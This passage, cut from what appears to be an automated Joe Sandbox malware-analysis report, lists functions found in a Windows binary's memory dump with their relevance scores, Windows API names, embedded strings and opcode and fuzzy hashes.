                                                                                                                    • Opcode ID: 75866f010e58a3fc818b9e79ca1673d0eb2b88fc9f6dc7d78431492add23c59c
                                                                                                                    • Instruction ID: 066744f2a6eb80cc704c4cd3387d7ea136a1528492258a8c85dcd3631c73b96e
                                                                                                                    • Opcode Fuzzy Hash: 75866f010e58a3fc818b9e79ca1673d0eb2b88fc9f6dc7d78431492add23c59c
                                                                                                                    • Instruction Fuzzy Hash: 48E1A512F08A5781EE60DF65DA402B923A0BF50B98B4C4571D95EE77E4EF3EE959C300
                                                                                                                    Function 00007FF6560687CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 4125642244-438819550
                                                                                                                    • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                                                    • Instruction ID: c2c16824d3fa59ae0b6d7040793cc452774b1e3a2812dfe6b2f22355db1595e6
                                                                                                                    • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                                                    • Instruction Fuzzy Hash: CC81B532B18A8285EB90DF15D9446BD73A0FF44B88F880036DA4EA7795DF7ED989C710
                                                                                                                    Function 00007FF65605A40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1460738036-3110715001
                                                                                                                    • Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                                                    • Instruction ID: 5fe991874dfa7e9aaf8dfd999fce4ab1a8edcd31db375b8639507d28504460fa
                                                                                                                    • Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                                                    • Instruction Fuzzy Hash: 36711826E086924AF751CF25D6446BE27E2FB54748F5C4431DA4EA7681CF7EE84EC700
                                                                                                                    Function 00007FF656063268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 3297454147-3080491070
                                                                                                                    • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                    • Instruction ID: 53081658c2e3949da717e240df7207a9f61c17ba542421cd14c00d6f897a1f32
                                                                                                                    • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                    • Instruction Fuzzy Hash: A961A831B18A8392EB44EF24D5445FD6361FF40B48F885032EA4DA3699DF7DE90ACB40
                                                                                                                    Function 00007FF6560574B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 4051287042-2268648507
                                                                                                                    • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                    • Instruction ID: 4d9e6dbcbc83fdcd3ee35e4245c619869506bb862ccc11447403e625a808966e
                                                                                                                    • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                    • Instruction Fuzzy Hash: B451CB25F18A8391EB40EB64E9454FD6321FF94B48F884032EA4DB3699DF7DD90AC740
                                                                                                                    Function 00007FF65605D4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 3935177441-3405671355
                                                                                                                    • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                    • Instruction ID: 52f70902b47db36c2202b54838e90380a79f59a268857e4c3458d76aac902e25
                                                                                                                    • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                    • Instruction Fuzzy Hash: DF316D20E0960782F7219B21EA547792362EF99748F4C4132DA0EE76E0CE3EB48DC701
                                                                                                                    Function 00007FF655FE15EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1974058525-0
                                                                                                                    • Opcode ID: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                                                                    • Instruction ID: ae3ec986cf487e013da58355244352c600d66dcce58859a371afa12527a2b321
                                                                                                                    • Opcode Fuzzy Hash: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                                                                    • Instruction Fuzzy Hash: 74915C39A09A0685EF958F12EA54A793360FF85F88F9C4532C94EEB654CE3DE849C710
                                                                                                                    Function 00007FF656052F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                                                    • Instruction ID: 2370d566a43e5046aa6b1c81284db3daee20d6cf07ec0dbc78c14ac238a534a2
                                                                                                                    • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                                                    • Instruction Fuzzy Hash: 76618F72B046418BE718CB6AE55466C77A2B788B88F148539DE09E3F58EF3DD909CB00
                                                                                                                    Function 00007FF656064708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerTypewcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 1561581874-1000479233
                                                                                                                    • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                                                    • Instruction ID: cf826084a3e3848dc115c041d3f46db7c3a440226dfeadbea3b3d354cdda7651
                                                                                                                    • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                                                    • Instruction Fuzzy Hash: 0AD1B732E18A9641EAA09B15D74017D63A1FF54BD8F488332DA5EA37E4DF3DE989C700
                                                                                                                    Function 00007FF65604FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 1412819556-679674701
                                                                                                                    • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                    • Instruction ID: bc19efcdef6a6f99eaa59184761a92f9441e2555d6f706da926c82b42cd2b9ea
                                                                                                                    • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                    • Instruction Fuzzy Hash: C9B1E272B0968297EB28CF26DA046FD6761FB54B84F480031CA1EA7795DF3EE959C700
                                                                                                                    Function 00007FF65605176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                                    • String ID: ThumbnailClass
                                                                                                                    • API String ID: 4010642439-1241985126
                                                                                                                    • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                    • Instruction ID: be324a62527152ae4e33147a03ad1c805c787f5941192e8456515d23bbcbd8a5
                                                                                                                    • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                    • Instruction Fuzzy Hash: 1BA1E532B0864343EA259F15D5446B9A762FF95784F484435CA8EA3A95EF3EF90DCB00
                                                                                                                    Function 00007FF655FE1504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1268354404-3110715001
                                                                                                                    • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                    • Instruction ID: 0ce25715d10ec23f4bcfc95104d91605071153fd18948a75bc9bc1073f15253c
                                                                                                                    • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                    • Instruction Fuzzy Hash: A361D03AA087428AEB54CF26D94467927A1FF84B9CF180535ED0EA7794DF3DE849CB40
                                                                                                                    Function 00007FF6560634E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 3297454147-2391861430
                                                                                                                    • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                    • Instruction ID: 79a0664d0da096edada2eed9c8a9461f59e93923967e1b811f084e75cd9a363b
                                                                                                                    • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                    • Instruction Fuzzy Hash: 0A71C935B18A8392EB44DB61E9444FD7321FF40B48F885032EA4DA7699DF7DD94ACB40
                                                                                                                    Function 00007FF65604C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 3030280669-22481851
                                                                                                                    • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                    • Instruction ID: 7c2109408806ee724a8be14869338ffb164a9976aa1d819223b78853f5f40b5d
                                                                                                                    • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                    • Instruction Fuzzy Hash: E0510922718B8385EB60DF65E9841ED77A0FB94798F440031EA4DA7A79DF7CD989CB00
                                                                                                                    Function 00007FF656063E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 3827137101-3457252023
                                                                                                                    • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction ID: fef6130c8e5b878e03881f006fee20c1cd42598d81d1faaa00be6d90cd859f98
                                                                                                                    • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction Fuzzy Hash: FB41E72261868385E7609F21EA006FD73A0FF85798F485135DA0DA3BA8DF7DD68EC740
                                                                                                                    Function 00007FF65604C5FC Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255039815-0
                                                                                                                    • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                                    • Instruction ID: 3390eed66d2eb879c27ec650d7c00899a08e1c6ae9a385954f3042f301204d6d
                                                                                                                    • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                                    • Instruction Fuzzy Hash: 6A61B232F0475186EB20CFA2D9505AC37B5FB54B99B088035DE8DA3B95DF7AD44AC340
                                                                                                                    Function 00007FF656057BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
